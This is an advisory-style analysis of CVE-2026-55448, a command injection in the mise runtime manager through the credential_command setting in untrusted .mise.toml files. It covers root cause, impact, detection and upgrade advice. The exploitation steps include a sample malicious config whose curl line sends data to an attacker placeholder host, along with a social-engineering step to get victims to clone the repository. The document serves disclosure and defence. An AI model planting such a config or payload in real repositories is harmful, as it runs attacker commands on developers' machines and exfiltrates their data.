CVE-2026-55448: 
Rust Analisi e mitigazione delle vulnerabilità

CVE-2026-55448 is an OS command injection vulnerability in mise (a polyglot runtime manager) that allows an attacker who can place a malicious .mise.toml in a repository to execute arbitrary shell commands as the victim user. The vulnerability affects mise versions >= 2026.3.15 and < 2026.6.4 (the credential_command field was introduced in v2026.3.15; v2026.3.14 rejects it as unknown). It was published on June 12, 2026, and patched on June 23, 2026. The CVSS v3.1 base score is 6.3 (Moderate) (GitHub Advisory, mise Advisory).

The root cause is CWE-78 (OS Command Injection): mise loads github.credential_command from local project config files via Settings::try_get() and parse_settings_file() without first verifying whether the local .mise.toml is trusted. When resolve_token() is called to obtain a GitHub token and no higher-priority GitHub token environment variable (e.g., GITHUB_TOKEN, MISE_GITHUB_TOKEN) is set, it reaches get_credential_command_token(), which executes the configured value directly via std::process::Command::new("sh").arg("-c").arg(cmd). This means any value set under [settings.github] credential_command in a local project config is executed as a shell command without sanitization or trust validation, enabling an attacker-controlled repository to supply arbitrary shell commands (GitHub Advisory, mise Advisory).

Successful exploitation allows arbitrary shell command execution as the victim user, with no trust prompt and no requirement for [env], [hooks], tasks, or templates in the malicious config. An attacker can achieve full confidentiality and integrity compromise of the victim's user context — including exfiltrating secrets, credentials, or source code, and modifying files. The attack is limited to scenarios where no higher-priority GitHub token environment variable is already set in the victim's environment (GitHub Advisory).

1. Prepare malicious repository: Create or compromise a repository and add a .mise.toml file containing:

[settings.github]
credential_command = "curl -s https://attacker.example.com/exfil?data=$(id); echo ghp_fake_token"

2. Social engineering / supply chain: Convince the victim to clone the repository (e.g., via a pull request, open-source contribution, or supply chain compromise).
3. Ensure no GitHub token env vars are set: The exploit only triggers if GITHUB_TOKEN, GITHUB_API_TOKEN, MISE_GITHUB_TOKEN, and MISE_GITHUB_ENTERPRISE_TOKEN are all unset in the victim's shell session.
4. Trigger execution: The victim runs any mise command that resolves a GitHub token, such as:

mise github token --unmask

5. Command executes: mise loads the local .mise.toml, passes the credential_command value to sh -c without trust validation, executing the attacker's payload as the victim user.
6. Achieve objective: The attacker receives exfiltrated data (e.g., environment variables, SSH keys, tokens) or achieves persistent access depending on the payload (GitHub Advisory, mise Advisory).

• File System: Unexpected files created in /tmp/ (e.g., /tmp/mise-proof.txt) or other writable directories following mise command execution; new or modified files in the user's home directory or project directories after running mise.
• Process: Unexpected child processes spawned by mise (e.g., sh, curl, wget, bash, python) visible in process trees; outbound network connections initiated by shell processes spawned from mise.
• Network: Unusual outbound HTTP/HTTPS requests from developer workstations to unknown external hosts shortly after mise command execution, particularly from shell child processes.
• Logs: Shell history or audit logs showing mise github token or similar commands executed in directories containing a .mise.toml with a credential_command entry; system audit logs (e.g., auditd) recording execve calls for sh -c with suspicious arguments originating from the mise process.

Upgrade mise to version 2026.6.4 or later, which resolves the issue by not honoring github.credential_command from non-global project config files. As a workaround prior to patching, always set a GitHub token environment variable (e.g., GITHUB_TOKEN) so the vulnerable credential_command path is never reached. Users should also audit any .mise.toml files in repositories they work with for unexpected [settings.github] credential_command entries (GitHub Advisory, mise Advisory).